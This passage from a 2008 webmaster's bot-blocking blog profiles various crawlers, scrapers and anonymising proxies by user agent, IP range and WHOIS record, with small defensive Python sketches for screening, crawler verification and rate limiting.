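    if prescreen(host):
        bad_sites.add(host)  # feed the result back into the shared database
        return "blocked: pre-screening"
    if scan_stream(host):
        bad_sites.add(host)  # a cloaker caught late still gets recorded
        return "blocked: transparent proxy"
    return "clean"
```

The point of the ordering is that the cheap database lookup runs first, so a site caught once by either of the other layers never gets a second chance to cloak.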

Summary

When you pile up all of this security the chances of failure still exist but the end user is protected and informed as much as humanly possible from all of the threats present.

It would certainly be nice to see some of the anti-virus providers combine their efforts as outlined above to make the internet a safer place to visit.

Sunday, April 27, 2008

Off By More Than One

Can you believe that someone is actually surfing the web using some free browser called Off By One that doesn't appear to have been updated in the last 2 years?

The user agent is as follows:

"Mozilla/6.0(compatible;OffByOne;Windows 2000)"
The irregular formatting convention triggered the bot trap with the lack of spaces alone.
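For the curious, here's a minimal sketch of the kind of spacing check that would catch a string like that. This is not the actual bot trap, just an assumed heuristic: the pattern and the function name `looks_irregular` are made up for illustration.

```python
import re

# Conventional browser strings look like "Mozilla/4.0 (compatible; MSIE 6.0; ...)":
# a space before the parenthesis and "; " between the tokens inside it.
WELL_FORMED = re.compile(r"^Mozilla/\d+\.\d+ \([^()]*\)")


def looks_irregular(user_agent: str) -> bool:
    """Flag Mozilla-style user agents that skip the usual spacing."""
    if not user_agent.startswith("Mozilla/"):
        return False  # this check only covers Mozilla-style strings
    if not WELL_FORMED.match(user_agent):
        return True   # e.g. no space between the version and "("
    inside = user_agent[user_agent.index("(") + 1:user_agent.index(")")]
    # Every ';' inside the parentheses should be followed by a space.
    return re.search(r";(?! )", inside) is not None
```

A real filter would need more than this, since plenty of scrapers copy a well-formed browser string character for character.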

Then it claims to be Mozilla 6.0 when it's probably Mozilla 3.0 at best.

Considering how few times, if ever, this browser has visited, it's obviously very rare.

Maybe some online nerd activist will get it declared as an endangered online species so it will become protected by law.

Don't laugh, you know it'll happen eventually...

Sunday, April 20, 2008

Reciprocal Link Exchange? Let's Swap!

For years I've been deleting all those emails asking me to exchange links and I won't swap links with any of that crap.

Suddenly I've had an epiphany and YES!, now I'll swap links with you, no problem!

I'm only agreeing to swap links as requested.

I'm not using NOFOLLOW on those links as requested.

You can see my links when you visit, online and visible as agreed.

Unfortunately my link swapping page will never be seen by Google, Yahoo, MSN or any other search engine but you'll see it just fine.

I'm going to hold up my end of the bargain, we swapped links, how about you?

Kaushik, What Freaking Experiments?

I found this user agent coming out of Microsoft's Area 131 requesting that people "contact kaushik for these experiments" that kept hitting one of my servers.

131.107.0.96 "contact kaushik for these experiments"
So I did a little data mining of my own and searched Microsoft and couldn't decide if this experiment was from Kaushik #1 or Kaushik #2.

Both Kaushiks appear to be working for the Data Management, Exploration and Mining Group (DMX) at Microsoft, but which one ran this experiment?

OK, will the real Kaushik running these experiments please stand up?

BTW, was your experiment finding sites running bot blockers?

If so, you succeeded and your requests were stopped. ;)

DNS Right But User Agent Wrong

Ran into a user agent from DNSRight today that claimed to be some link check tool that doesn't appear on their site.

66.240.236.220 "GET / "
"http://www.dnsright.com/" "DNSRight.com WebBot Link Ckeck Tool. Report abuse to: dnsr@dnsright.com"
So I ran some of their other tools that don't identify themselves at all.
66.240.236.220 "GET / HTTP/1.1" "-" "-"
They host this mess at cari.net so just block 'em.
OrgName: California Regional Intranet, Inc.
NetRange: 66.240.192.0 - 66.240.255.255
CIDR: 66.240.192.0/18
No more DNS Right or Left, it's now DNS Gone.

Thursday, April 17, 2008

Picmole, Yet Another Spybot!

There must be good money spying on everyone because it seems a new company springs up almost weekly trying to claim their stake in this new gold rush.

How many fucking spybots do we need?

Today on the spybot circuit we're serving up a helping of Picmole that's using heritrix to do its crawling. Surprisingly it still checks robots.txt but who knows if they'll honor it down the road because honoring robots.txt conflicts with accomplishing their stated goals.

Identifying their spider properly and crawling from easily identifiable IPs will also present them problems as their activities increase but being a new service they'll soon figure that out and probably go stealth like all the rest.

208.109.189.127 [ip-208-109-189-127.ip.secureserver.net.] requested 1 pages as "Mozilla/5.0 (compatible; heritrix/1.12.0 +http://www.picmole.com)"
Sorry, but your bot hit a firewall on your first attempt.

Abort, Retry, Ignore?

Favcollector Bandwidth Waster

Here's another product of Canada doing the stupidest shit ever seen, collecting favicons.

It came and grabbed my icon, then hit the home page which the bot blocker promptly stopped, so who the hell knows what else it would've done beyond that.

66.207.217.138 [gaspra.crazylogic.net.] "Favcollector/2.0 (info@favcollector.com http://www.favcollector.com/)"
From their FAQ:
Favcollector is a spider that searches the internet for favicons. It downloads and stores these favicons for each site it visits. It will go back once a month to see if the favicon has changed and will download the new icon if it is has, effictivly creating an archive of all favicons on the internet.
Spider?

Spider my ass...

Spiders ask for robots.txt files, read them, and go away.

Not this piece of shit as it just comes and it takes what it wants without regard to the webmaster's wishes.

Not only that, a bunch of trademarked icons are now on their site without permission which will most likely make some crazed trademark enforcers start jumping up and down once they find that site.

BTW, run a damn spell checker on your site as the word is effectively, not "effictivly" unless that's the Canadian spelling.

Canasasearchbot For Canasians, Oh Canasa!

It's hard to resist commenting on a bot that can't even spell its own name or its country name correctly.

206.248.137.34 [mycanadasearch.ca.] "canasasearchbot(http://www.mycanadasearch.ca/robots.html)"
However they got it right on their robots page:
User-agent: canadasearchbot
It did ask for robots.txt but who knows if it was looking for "canasasearchbot" or "canadasearchbot", total crap shoot.
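To show why the typo matters, here's a small sketch using Python's standard `urllib.robotparser`. The robots.txt content is hypothetical, and this only shows how Python's parser matches names, not how their crawler does it.

```python
from urllib.robotparser import RobotFileParser

# Hypothetical robots.txt written for the name shown on their robots page.
ROBOTS_TXT = """\
User-agent: canadasearchbot
Disallow: /
"""

parser = RobotFileParser()
parser.parse(ROBOTS_TXT.splitlines())


def allowed(agent: str, path: str = "/index.html") -> bool:
    """True if the parsed rules let this user agent fetch the path."""
    return parser.can_fetch(agent, path)
```

With this parser, `allowed("canadasearchbot")` comes back False, but `allowed("canasasearchbot")` comes back True because no rule matches the misspelled name. So a webmaster who blocks the documented name may not be blocking the bot at all.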

I tried their little search engine and it took it a really long time to come back with some really bad results.

Here's a "search tip", try searching your log file and examine what your crawler is putting in that log file before turning it loose on the world.

Nothing like that fine Canadian quality, eh?


Monday, April 14, 2008

Mozshot Tries Taking a Screenshot

Yet another Firefox-based screen shot tool hit my other site today just in time to take a screen shot of an error message telling them they weren't allowed to take screen shots without permission.

Details:

61.206.125.245 [tempest.nemui.org.]
"Mozilla/5.0 (Gecko/20070310 Mozshot/0.0.20070628; http://mozshot.nemui.org/)"
This thing appears to be open source, oh joy...

Friday, April 11, 2008

RTGI - The French Social Media Spybot

Yet another social media mining operation designed to track every bit of intel said about brands, people, politics and more.

From a translation of their site:

Our solutions simplify the identification of influential communities and monitoring of their conversations, to the benefit of businesses, communication agencies or research institutes.

RTGI's approach allows the analysis of the links and content generated by the citizens, journalists, consumers or activists, to draw the contours of communities conversations around your issues, brands and products and their real impact on your image online. RTGI have elaborated the linkfluence to give a unit of reliable measurement of the influence of the social web sites.
The highlighting was added to help you see how it facilitates spying on your ass without going to much effort to do so.

Heck, the French government is in their list of clients!
  • Information Service (GIS) government
  • Ministry of the Economy, Finance and Employment
  • Picardy Regional Council (RENUPI)
Sheesh, didn't need to translate as they have an English .EU version too.

Oh well, I'm not rewriting it!

Continuing on...

George Orwell obviously didn't anticipate the internet and he was off by a few years, 24 to be exact, but his overall message of Big Brother watching us in 1984 is finally coming true in 2008.

Anyway, back to the details:
"mozilla/5.0 (compatible; RTGI; http://rtgi.fr/)"
The IP's they operate from are:
88.191.50.170 -> sd-8985.dedibox.fr.
91.121.108.180 -> t800.rtgi.eu.
91.121.25.182 -> merlin.rtgi.eu.
91.121.25.184 -> r2d2.rtgi.eu.
91.121.79.160 -> c3po.rtgi.eu.
The old address of 88.191.50.170 doesn't appear to have been active since 04/13/2007 so I probably wouldn't worry about that too much unless you just want to block that dedicated hosting range for good measure.
inetnum: 88.191.3.0 - 88.191.248.255
netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Paris, France
route: 88.160.0.0/11
The dedicated host they currently use has this range of IPs:
inetnum: 91.121.0.0 - 91.121.31.255
netname: OVH
descr: OVH SAS
descr: Dedicated Servers
descr: http://www.ovh.com
So there you go, another way to make your site part of the anti-social media by keeping the snoops out.
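For anyone turning those WHOIS ranges into firewall rules, here's a minimal sketch using Python's standard `ipaddress` module. The variable and function names are just for illustration.

```python
import ipaddress

# inetnum range quoted from the OVH WHOIS record above
first = ipaddress.ip_address("91.121.0.0")
last = ipaddress.ip_address("91.121.31.255")
ovh_blocks = list(ipaddress.summarize_address_range(first, last))

# The four current RTGI addresses listed above
rtgi_ips = ["91.121.108.180", "91.121.25.182", "91.121.25.184", "91.121.79.160"]


def covered(ip: str) -> bool:
    """True if the address falls inside the quoted OVH range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ovh_blocks)


# Addresses the quoted range does NOT cover
uncovered = [ip for ip in rtgi_ips if not covered(ip)]
```

The range collapses to a single block, 91.121.0.0/19. By this arithmetic the quoted range only covers the two 91.121.25.x addresses, so it's worth running WHOIS on the other two before assuming one rule catches everything.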


Project Rialto's PRCrawler Is Data Mining?

Since I whitelist allowed bots I've had Project Rialto blocked since the beginning but I was curious what they were doing since they first showed up on my radar on 01/23/2008 and kept coming back over and over.

From one of their job ads:

We are designing high-performance algorithms and developing reliable, fault-tolerant and scalable real-time systems that can handle massive volume of data for in-depth analysis of user behavior to enable targeted advertising.

and...

Research and investigate academic and industrial data mining, machine learning and modeling techniques to apply to our specific business case
Oh boy!

It appears they want to crawl our sites and use that information to shove more ads in our face.

Somehow, I don't think so...

If you're going to mine data, shouldn't you get the URLs right?

The site they're attempting to "mine" is on a Linux box where URLs are case sensitive, and my URLs all have upper/lower case in them, yet the PRCrawler only asks for those URLs in all lower case, so even if I let them crawl my site they'd get nothing but 404s.

No wonder their home page says they're a "stealth company" because I'd hide too if I couldn't even get the proper case of the URLs right.
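For what it's worth, only the scheme and host of a URL are safe to lower case; the path has to be left alone. A minimal sketch of doing it right in Python follows. The function name `normalize_url` is made up, and it assumes URLs without a user:password part, since that part is case sensitive too.

```python
from urllib.parse import urlsplit, urlunsplit


def normalize_url(url: str) -> str:
    """Lower-case only the scheme and host, leaving the path untouched."""
    parts = urlsplit(url)
    return urlunsplit((
        parts.scheme.lower(),
        parts.netloc.lower(),   # assumes no userinfo in the URL
        parts.path,             # case sensitive on most Unix servers
        parts.query,
        parts.fragment,
    ))
```

Compare that with slapping `.lower()` on the whole string, which turns `/Some/Page.html` into `/some/page.html` and earns a 404 on a case-sensitive server.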

Here's their user agent:
"PRCrawler/Nutch-0.9 (data mining development project; crawler@projectrialto.com)"
They operate from the following IPs:
64.47.51.153
64.47.51.158
67.202.0.157
67.202.0.17
67.202.0.71
67.202.10.65
67.202.18.229
67.202.29.20
67.202.3.112
67.202.3.141
67.202.3.151
67.202.56.219
67.202.58.214
67.202.59.117
67.202.62.162
67.202.62.45
72.44.36.20
72.44.36.8
72.44.37.72
72.44.39.55
The first two were from masergy.com, the rest are all from compute-1.amazonaws.com.
host-64-47-51-153.masergy.com.
host-64-47-51-158.masergy.com.
I haven't seen anything from masergy.com since the initial contact but that's only 2 months ago so who knows.

Don't know where they primed the pump for their data mining operation since they already had lots of information about my site when they attempted to crawl, but since it was all lower case it was completely useless.

I'm just curious if they got my URLs from somewhere already in lower case or someone there slapped a tolower() around a line of code when importing the URLs into Nutch.

Don't know, don't care, it's amusing either way.

Good luck with Project Rialto, you're going to need it.

Wednesday, April 09, 2008

Radian6's R6_FeedFetcher Fetching More Than Feeds

For those of you unfamiliar with Radian6 it's a "social media monitoring tool" because apparently everyone with an opinion on the internet needs someone to spy on their ass since we're disruptive.

Well bummer.

Isn't it a shame the good old days are gone where companies told you everything you needed to know about their brand and you had to be a journalist just to get your opinion heard?

Of course those so-called journalists never gave you their real opinion because of fear of losing advertisers so it was all candy coated bullshit that just bordered on the truth because advertisers couldn't handle the truth fearing nobody would buy their shit.

Tough shit and god bless the great equalizer called the Internet that leveled the playing field between consumers and companies so we can find out what's really going on without everything being filtered through the company spin doctor.

Their crawler details are:

142.166.3.122 "R6_FeedFetcher(www.radian6.com/crawler)"
The amusing thing about the R6_FeedFetcher is I never see it fetching the feed, instead it's trying to fetch pages linked from the feed, which is what we call a crawler and not a fucking feed fetcher.

Does it read robots.txt to see if it's allowed beyond my RSS feed?

Fuck no.

I looked at all accesses on my RSS feed and didn't see anything obvious so maybe they get RSS feeds from FeedBurner or something similar, who knows.

Anyway, it's blocked now on my other site so I can be as disruptive as I want there.

However, who wants to place bets that this disruptive post will be monitored?


P.S. The site R6_FeedFetcher is blocked on is not this blog for first time readers ;)

Update:

After doing some research it appears they also have the following user agent:
R6_CommentReader(www.radian6.com/crawler
Also, read this interesting post about Radian6 on Simon's blog.

Friday, April 04, 2008

Discovery Engine's Discobot Discovered My Bot Blocker

I found this little Discobot from Discovery Engine trying to dance around on my server but the bot blocker bouncer at the door was already keeping him behind the velvet ropes.

Here's a sample of what I saw on my site:

208.96.54.74 "GET /robots.txt"
"Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"

208.96.54.68
"Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"
It does honor robots.txt just like they said it did but it cached it for about 48 hours between visits.

They were nice enough to provide the range of IPs it uses:
208.96.54.67 - 208.96.54.96
Those IPs are from Servepath which I already block.

Between whitelisting allowed bots and blocking more data centers than I'd care to admit, this poor little Discobot didn't stand a chance to discover anything.

Call back when you're all grown up and ready to send traffic.


Persaibot - The Rude Crawler

I saw this little Persaibot hit my site today without even looking at robots.txt and their website has the balls to say:

Persai uses this bot to crawl the web. It's probably the nicest bot with the greatest personality in the world. Seriously, give it some attention.
Exactly how nice can a bot be that doesn't read robots.txt?

Did you read it and cache it some other day?

Doesn't matter, that was more than 24 hours ago, read it again.

I checked my logs from yesterday, it didn't read it then either and Persai hadn't visited my site in about a month before that.

I'm sorry, you have made a huge faux pas in robot rudeness.
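Being polite here isn't hard. Below is a minimal sketch of a robots.txt cache that re-reads the file once its copy is more than 24 hours old. The class name `RobotsCache` and the injected `fetch` downloader are hypothetical, and the 24 hour cutoff is simply the threshold used in this post.

```python
import time
from typing import Callable, Dict, Tuple

MAX_AGE = 24 * 60 * 60  # seconds; re-read robots.txt after 24 hours


class RobotsCache:
    """Caches robots.txt bodies per host and refetches stale copies."""

    def __init__(self, fetch: Callable[[str], str],
                 clock: Callable[[], float] = time.time) -> None:
        self._fetch = fetch    # hypothetical downloader: host -> robots.txt text
        self._clock = clock    # injectable so the expiry logic can be tested
        self._cache: Dict[str, Tuple[float, str]] = {}

    def get(self, host: str) -> str:
        """Return robots.txt for the host, refetching if missing or stale."""
        now = self._clock()
        cached = self._cache.get(host)
        if cached is None or now - cached[0] >= MAX_AGE:
            cached = (now, self._fetch(host))
            self._cache[host] = cached
        return cached[1]
```

A crawler would call `get()` before every batch of requests to a host, so a month-old copy never gets used.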

Here's the intel I have on this little bot:
71.204.131.68 [c-71-204-131-68.hsd1.ca.comcast.net]
"PersaiBot/2.1-dev3a (Persai web crawler; http://www.persai.com/bot.html; bot at persai dot com)"

67.202.55.205 [ec2-67-202-55-205.compute-1.amazonaws.com]
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +http://www.persai.com/bot.html)"

76.102.193.127 [c-76-102-193-127.hsd1.ca.comcast.net]
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +http://www.persai.com/bot.html)"
Now the true irony here is that the CEO of Persai posted on his blog complaining about another search engine called Spock scraping every little bit of data about him but at least Spock claims to honor robots.txt.

Must be a karma thing ;)

DART Agent - Another Annoying Distributed Tool

This little annoying DART thing that keeps bouncing off my web site appears to be written by CRS4, the Center for Advanced Studies, Research and Development in Sardinia.

It would appear DART stands for "Distributed Agent-based Retrieval Tools" and they even have a workshop in '06 about this damn thing touted as "The Future of Search Engines' Technologies" that had people from Yahoo!, Google, Quaero and Ask attending.

Here's a sample of some IPs it operates from and the shitload of versions this thing has:

212.123.91.18 "DART Agent, version 1.2 (build 14062007)"
212.123.91.78 "DART Agent, version 1.2.7 (build 27062007)"
212.123.91.78 "DART Agent, version 1.4 (build 17102007)"
156.148.18.62 "DART Agent, version 1.4 (build 29102007)"
156.148.18.62 "DART Agent, version 1.4.1 (build 05112007)"
156.148.18.62 "DART Agent, version 1.4.2 (build 08112007)"
212.123.91.78 "DART Agent, version 1.4.3 (build 15112007)"
212.123.91.78 "DART Agent, version 1.4.3 (build 19112007)"
212.123.91.78 "DART Agent, version 1.4.4 (build 05122007)"
212.123.91.78 "DART Agent, version 1.4.5 (build 06122007)"
212.123.91.78 "DART Agent, version 1.4.6 (build 14012008)"
156.148.18.62 "DART Agent, version 1.4.6 (build 14012008)"
212.123.91.78 "DART Agent, version 1.4.7 (build 24012008)"
212.123.91.78 "DART Agent, version 1.4.8 (build 04022008)"
212.123.91.78 "DART Agent, version 1.5 (build 08022008)"
212.123.91.78 "DART Agent, version 1.5.1 (build 14022008)"
212.123.91.78 "DART Agent, version 1.5.2 (build 18022008)"
212.123.91.78 "DART Agent, version 1.5.5 (build 27022008)"
156.148.18.62 "DART Agent, version 1.5.6 (build 28022008)"
212.123.91.78 "DART Agent, version 1.5.6 (build 28022008)"
212.123.91.78 "DART Agent, version 1.5.1 (build 14022008)"
212.123.91.78 "DART Agent, version 1.5.7 (build 05032008)"
82.85.70.40 "DART Agent, version 1.5.2 (build 18022008)"
212.123.91.78 "DART Agent, version 1.5.8 (build 06032008)"
156.148.18.62 "DART Agent, version 1.5.8 (build 06032008)"
82.85.70.42 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.5.9 (build 19032008)"
212.123.91.78 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.5.9 (build 20032008)"
213.205.44.51 "DART Agent, version 1.5.8 (build 06032008)"
213.205.44.52 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.6 (build 02042008)"
213.205.44.52 "DART Agent, version 1.5.8 (build 06032008)"
156.148.18.62 "DART Agent, version 1.6.0 (build 02042008)"
Looks like so far it's only operating out of Italy. They're nice enough to provide reverse DNS when it operates off their own servers ("dartcn01.crs4.it") and even from another source ("dart02.itsm.tiscali.com"), so the crawler can be verified there. Other sources, such as "82-85-70-40.b2b.tiscali.it", can't be verified, so it's going to be a problem child for anyone that wants to let it play but make sure it's not being spoofed.
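The usual way to do that verification is a forward-confirmed reverse DNS check, sketched below in Python. The helper names are made up, and treating ".crs4.it" and ".itsm.tiscali.com" as trusted suffixes is an assumption based only on the hostnames above.

```python
import socket
from typing import Callable, List, Sequence


def reverse_dns(ip: str) -> str:
    """PTR lookup: IP address -> primary hostname."""
    return socket.gethostbyaddr(ip)[0]


def forward_dns(host: str) -> List[str]:
    """A lookup: hostname -> list of IPv4 addresses."""
    return socket.gethostbyname_ex(host)[2]


def verify_crawler(ip: str,
                   allowed_suffixes: Sequence[str],
                   reverse: Callable[[str], str] = reverse_dns,
                   forward: Callable[[str], List[str]] = forward_dns) -> bool:
    """The PTR name must end in a trusted suffix AND resolve back to the same IP."""
    try:
        host = reverse(ip).rstrip(".").lower()
        if not any(host.endswith(suffix) for suffix in allowed_suffixes):
            return False
        return ip in forward(host)
    except OSError:
        return False  # no PTR record or lookup failure: treat as unverified


# Suffixes taken from the hostnames above; trusting them is an assumption.
DART_SUFFIXES = (".crs4.it", ".itsm.tiscali.com")
```

Under these suffixes a hit resolving to something like "82-85-70-40.b2b.tiscali.it" fails the check, which is exactly the problem child case.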

Just what the web needs, more distributed web technology to bug the fuck out of webmasters just trying to scratch out a living on the internet.

Oh well, it can't play on my server so what the hell do I care anyway!


Saturday, March 29, 2008

WHO is Scraping My Site!

Note the lack of a question mark in the title because this wasn't a question about "WHO?" but an actual statement about "WHO!" and by that I mean the WHO as in an office of the World Health Organization.

It registered 411 page requests from 203.94.76.59 which is a non-portable address assigned to the WHO Representative Office in Sri Lanka.

Here's the IP and UA:

203.94.76.59
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Here's the WHOIS:
inetnum: 203.94.76.56 - 203.94.76.63
netname: WHO-SLT-LK
country: LK
descr: WHO Representative Office
descr: 385, Health Inform. Centre, Suwasiripaya, Deens Road, Colombo-10
admin-c: NS198-AP
tech-c: NS198-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MNT-SLT-LK
source: APNIC

person: Network Administrator SLTNet
nic-hdl: NS198-AP
address: Sri Lanka
country: LK
mnt-by: MNT-SLT-LK
source: APNIC
It pretended to be a human browser like so many of them do these days by pulling all the images from the index page and then it took off ripping pages like a bandit.

It wasn't even a smart bot as the first link it hit off the index page was my bot trap which is easily flagged and avoidable in the robots.txt as a no crawl zone, so it definitely wasn't human.

Of course the robots.txt file is my other bot trap but what the hell.

Then it went screaming along asking for the next 409 pages at 2-3 pages a second.
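Speed like that is easy to spot with a sliding window counter. Here's a minimal sketch; the class name `RateWatcher` and the default of more than 10 pages in 5 seconds are assumed values for illustration, not the thresholds my bot blocker actually uses.

```python
from collections import defaultdict, deque
from typing import Deque, Dict


class RateWatcher:
    """Flags an IP once it exceeds max_hits page requests within window seconds."""

    def __init__(self, max_hits: int = 10, window: float = 5.0) -> None:
        self.max_hits = max_hits
        self.window = window
        self._hits: Dict[str, Deque[float]] = defaultdict(deque)

    def record(self, ip: str, timestamp: float) -> bool:
        """Record one page request; return True if the IP is over the limit."""
        hits = self._hits[ip]
        hits.append(timestamp)
        # Drop requests that have aged out of the window.
        while hits and timestamp - hits[0] > self.window:
            hits.popleft()
        return len(hits) > self.max_hits
```

At 2-3 pages a second a scraper blows through that limit within the first few seconds, while a person clicking around never gets near it.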

It would appear that WHO should check out the health of their computer network as something is rotten in their offices in Sri Lanka.

Friday, March 28, 2008

REBI-Shoveler Digging for Korean Search Engine

REBI-Shoveler must be easily overlooked as it's very unusual to go to a search engine and type in the user agent and get no authoritative hit from any bot hunter whatsoever. There were tons of hits from various web stat pages but nothing I could easily find that gave me any clue what in the hell this thing was.

With this little information all I knew was it came from Korea, otherwise I was stumped:

116.122.36.150 "REBI-Shoveler v0.1"
Finally I decided to see if I could find any more clues in the several years of bot tracking archive files I keep and sure enough, there was a single original hit on my server that contained the answer I was looking for:
116.122.36.48
"REBI-Shoveler/RS Ver. -100.0 (REBI's great worker ... ; http://rebi.co.kr; deisys@rebi.co.kr)"
This bot operates out of multiple IPs in the range of 116.122.36.* and here's a little translation for you from their site about REBI, but there's no mention of robots.txt, nor did it ask for the file when it visited my site today, so it's behaving badly.

Now you know who REBI is that's shoveling shit off of your server.

Enjoy.

We'll Have Anon Of That, John Doe Must Go

Looks like JonDonym - the internet anonymisation service is actively operating as those little anonymous hits are coming from their servers.

I have a couple of actual scrapes happening from their IPs, who would suspect abuse of anon proxies, right?

Here's a couple of examples of activity:

141.76.45.34 [proxy1.anon-online.org.]
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13

141.76.45.35 [proxy2.anon-online.org.]
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13

Don't know what other IPs it operates from but 141.76.45.* and anything resolving to anon-online.org are blocked for now.
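That block rule boils down to two checks, sketched here in Python with the standard `ipaddress` module. The function name `is_anon_proxy` is made up, and the reverse DNS name is assumed to have been looked up already by whatever does the logging.

```python
import ipaddress

BLOCKED_NET = ipaddress.ip_network("141.76.45.0/24")   # i.e. 141.76.45.*
BLOCKED_DOMAIN = "anon-online.org"


def is_anon_proxy(ip: str, reverse_name: str = "") -> bool:
    """True if the IP is in the blocked /24, or its reverse DNS name is
    anon-online.org or a subdomain of it."""
    if ipaddress.ip_address(ip) in BLOCKED_NET:
        return True
    name = reverse_name.rstrip(".").lower()
    return name == BLOCKED_DOMAIN or name.endswith("." + BLOCKED_DOMAIN)
```

Matching on "." plus the domain rather than a bare suffix keeps a lookalike such as "notanon-online.org" from being blocked by accident.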

Good luck with your John Doe anonymity while I work on my taxes as you've just been H&R Blocked!

With tax deadlines close at hand I couldn't resist ;)

Monday, March 24, 2008

Please Install Flash - Idiots Guide To Flash Web Stupidity

Time to rant about a big pet peeve of mine, that little line of javascript that detects whether or not Flash is installed and the stupid shit developers do when it fails.

For a little introduction to the problem, I run Firefox with NoScript enabled globally for security purposes. However, I can easily enable javascript with a click except some developers do some really stupid shit that's costing their clients visitors.

Here's a few brain dead examples of Flash sites done wrong in the hands of idiots:

1. When javascript is disabled a blank page often results without even a hint, looks broken, visitors go away thinking you're stupid as dirt for putting up a blank page.

2. Redirecting visitors to a "Please Download Flash" page is just asinine. When visitors then enable javascript so your flash will work we're off on some other stupid page instead of where we wanted to go. Yup, frustrate your visitors and they'll just go elsewhere where sites aren't developed by designers that rode the short yellow bus to VoTech.

3. Using the NOSCRIPT tag to incorrectly tell us we don't have Flash installed because that tag actually means we have javascript disabled and you have no fucking clue if we have Flash installed or not until we turn on javascript you fucking idiots. Tell us correctly to ENABLE JAVASCRIPT to run the site in your NOSCRIPT tag and then let the javascript tell us we don't have Flash installed.

I'm sure I'll have some other addendums later but these are the top 3 offending things moronic Flash site developers do off the top of my head.

Anyone else got a pet Flash peeve?

Friday, March 14, 2008

SearchMe Demos Wicked Cool Visual Search Engine

Looks like I was right on the money back in Oct '07 when I announced that I had spotted SearchMe taking screen shots on one of my sites and I knew this was a hot news item but couldn't get the Sphinners to bite on it.

Here we are 6 months later and the story broke a couple of days ago on the Silicon Valley WebGuild:

Searchme is a new search engine that captures images of web pages and allows users to navigate visually through these page snapshots.
Searchme is currently running a private beta but the flash demo on their web site is real fucking cool so I hope their search technology is as good because this is so wicked it could be a real Google killer.



I'll bet Microsoft, Yahoo or Ask tries to buy this technology ASAP before Google can get their hands on it as something this hot could put any of the lesser search engines back on the map.

If you want information about their spider named Charlotte and IP addresses so you can let Searchme into your site and past your firewall, read my previous post with all the pertinent information.

Wednesday, March 12, 2008

Welcome to Opt-In Web 3.0 Politeness


Sunday, March 09, 2008

Gone Fishkin With More SEOMoz Tool Activity

In my continuing series of exposing SEO tools we find this little SEOmoz-bot over at SEOmoz.

I'll give SEOmoz some credit where credit is due in that they at least identify their tool as a bot so it can be blocked if you want. However, they don't check robots.txt to see if the bot is allowed. I think they assume it's always going to be used by the site owner, but it could just as easily be used on some competitor's site as well.

Here are the IPs and the user agent used:

209.40.115.202 "SEOmoz-bot"
209.40.116.200 "SEOmoz-bot"
The IP's belong to HopOne which provides various services including hosting.
OrgName: HopOne Internet Corporation
NetName: HOPONE-DCA2-4
NetRange: 209.40.96.0 - 209.40.127.255
I think that range is safe to block as it appears they use 'DC' in the net name of their data centers but it's probably worth checking to see what bounces for a few days to make sure.

Of course the best SEO is secure SEO, so block 'em ;)

Smack the SMILE SEO TOOLS Off Your Face

Some spamming assholes in Russia think automatic directory submission is the same as SEO and added one of my sites to their so called SMILE SEO TOOLS.

Here's a list of the various user agents I've seen claiming to be this tool:

"SMILESEOTools"
"SMILE SEO Tools"
"SMILESEOTools(Windows;compatible;MSIE6.0;I;WindowsNT5.0)"
The last user agent with an extremely lame ass attempt to mimic MSIE 6 gave me a good giggle.
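All three variants can be caught with one case-insensitive pattern. A minimal Python sketch, with the function name `is_smile_seo_tools` made up for illustration:

```python
import re

# Matches "SMILESEOTools", "SMILE SEO Tools" and anything built on either,
# with or without spaces between the words.
SMILE_UA = re.compile(r"smile\s*seo\s*tools", re.IGNORECASE)


def is_smile_seo_tools(user_agent: str) -> bool:
    """True if the user agent claims to be SMILE SEO Tools in any spelling seen so far."""
    return SMILE_UA.search(user_agent) is not None
```

Matching on the user agent is a lot less work than chasing the IPs, at least until they change the name.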

Here's the list of IP's using this directory spamware, probably mostly proxy sites in Russia would be my guess as they have a ton of proxy sites for spamming over there.

Yes, 114 lovely IP's using SMILE SEO Tools for your viewing pleasure:
217.20.168.113
217.151.225.42
213.247.143.205
213.232.196.102
213.184.238.34
213.170.69.66
212.96.222.197
212.96.200.33
212.96.200.115
212.59.98.125
212.220.104.230
204.15.76.250
201.12.176.18
195.91.168.193
195.72.145.7
195.72.142.106
195.46.188.3
195.239.202.65
195.234.114.122
195.234.109.71
195.218.220.26
195.162.39.54
195.131.84.202
195.131.188.138
195.122.250.205
194.44.191.7
194.24.240.23
193.239.255.22
193.238.96.5
193.17.174.7
91.77.38.45
91.76.44.134
91.76.34.0
91.76.159.205
91.76.156.161
91.76.111.247
91.76.108.170
91.124.75.182
91.124.35.208
91.124.245.129
91.124.232.195
91.124.165.97
91.124.143.254
91.122.51.213
90.188.71.41
89.250.2.129
89.19.164.14
89.179.97.170
89.179.96.253
89.179.110.182
89.179.103.190
89.178.209.180
89.178.143.161
87.240.15.33
87.240.15.26
87.237.113.6
87.117.35.56
87.117.33.5
86.57.220.142
85.94.34.227
85.238.106.44
85.238.106.35
85.236.26.202
85.192.165.43
85.141.228.16
85.141.213.13
85.140.58.175
85.140.54.95
85.140.53.21
85.140.52.233
85.140.154.97
85.140.118.4
85.140.117.215
85.140.116.105
84.42.57.72
84.253.75.67
84.154.102.78
83.237.96.4
83.237.76.106
83.237.211.116
83.237.200.54
83.237.186.74
83.237.169.118
83.167.116.85
83.167.112.224
82.207.36.70
82.207.14.51
82.207.117.186
82.207.0.248
81.95.178.185
81.94.22.114
81.3.158.138
81.25.53.49
81.200.7.88
80.92.96.7
80.80.111.240
80.248.156.79
78.106.58.185
78.106.189.47
77.247.172.250
77.247.165.196
77.247.165.14
77.247.160.89
77.239.192.6
77.235.113.131
77.235.101.11
77.123.62.125
77.122.231.9
74.232.4.137
62.33.7.146
62.213.18.70
62.168.234.78
62.140.244.20
62.118.2.146
